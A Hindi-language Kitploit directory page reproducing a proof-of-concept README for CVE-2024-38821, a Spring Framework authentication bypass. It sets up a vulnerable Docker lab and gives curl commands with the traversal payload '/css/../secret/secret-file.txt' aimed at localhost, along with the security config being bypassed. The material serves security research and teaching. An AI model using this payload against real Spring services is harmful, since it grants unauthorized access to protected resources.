Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-38821-POC — CVE-2024-38821 के लिए अवधारणा-प्रमाण शोषण, Spring Framework में पथ ट्रैवर्सल के माध्यम से प्रतिबंधित संसाधनों तक पहुँचने के लिए प्रमाणीकरण बाईपास प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/masa42/cve-2024-38821-poc
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmasa42/cve-2024-38821-poc

CVE-2024-38821-POC

CVE-2024-38821 के लिए अवधारणा-प्रमाण शोषण, Spring Framework में पथ ट्रैवर्सल के माध्यम से प्रतिबंधित संसाधनों तक पहुँचने के लिए प्रमाणीकरण बाईपास प्रदर्शित करता है।

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-38821: प्रूफ ऑफ कॉन्सेप्ट (PoC): स्प्रिंग फ्रेमवर्क में प्रमाणीकरण बायपास

यह CVE-2024-38821 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट है।

निष्पादन चरण

  1. Docker इमेज बनाएँ (Spring Boot 3.3.4, Spring Framework 6.1.13 पर आधारित)

    root@kitploit:~
    cd vuln
    docker build -t cve-2024-38821-poc .
    
  2. कंटेनर चलाएँ और पोर्ट 8080 को होस्ट मशीन पर एक्सपोज़ करें

    root@kitploit:~
    docker run -d -p 8080:8080 --name cve-2024-38821-poc cve-2024-38821-poc
    
  3. PoC को निष्पादित करने और भेद्यता की पुष्टि करने के लिए निम्नलिखित कमांड चलाएँ

    root@kitploit:~
    curl -v --path-as-is "http://localhost:8080/secret/secret-file.txt" # अपेक्षित: 302 प्रतिक्रिया (लॉगिन आवश्यक)
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt" # अपेक्षित: 200 प्रतिक्रिया (प्रमाणीकरण बायपास किया गया)
    

    यदि हमला सफल होता है, तो प्रतिक्रिया प्रदर्शित करेगी: This is a secret file.

स्पष्टीकरण

  1. एक्सेस अनुमतियाँ कॉन्फ़िगर करने के लिए SecurityConfig.java बनाएँ:

    • /css/ के अंतर्गत पथों तक अप्रमाणित पहुँच की अनुमति दें।
    • /secret/ के अंतर्गत पथों के लिए प्रमाणीकरण आवश्यक है।
    root@kitploit:~
    public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {
        return http
            .authorizeExchange(exchange -> exchange
                .pathMatchers("/css/**", "/").permitAll() // Static resources and the top page do not require authentication
                .pathMatchers("/secret/**").authenticated() // Authentication is required for the "secret" path
                .anyExchange().authenticated() // Authentication is required for all other paths
            )
            .formLogin().and() // Enable form-based authentication
            .build();
    }
    
  2. निम्नलिखित पेलोड बनाएँ। चूँकि पेलोड /css/ से शुरू होता है, यह अनुमत पथ पैटर्न से मेल खाता है। यह /secret/ से शुरू नहीं होता है, इसलिए यह प्रमाणीकरण-आवश्यक पथ पैटर्न से मेल नहीं खाता है:

    • पथ: /css/../secret/secret-file.txt
  3. PoC को निष्पादित करने और यह जाँचने के लिए कि हमला सफल है या नहीं, निम्नलिखित curl कमांड का उपयोग करें:

    root@kitploit:~
    # नोट: URL सामान्यीकरण के बिना अनुरोध भेजने के लिए --path-as-is विकल्प आवश्यक है।
    curl -v --path-as-is "http://localhost:8080/css/../secret/secret-file.txt"
    

    यदि हमला सफल होता है, तो प्रतिक्रिया प्रदर्शित करेगी:

अस्वीकरण

यह PoC शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। किसी वास्तविक सिस्टम में इसका उपयोग करने से पहले, सुनिश्चित करें कि भेद्यता को ठीक कर दिया गया है और आपके पास उचित प्राधिकरण है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें
This is a secret file.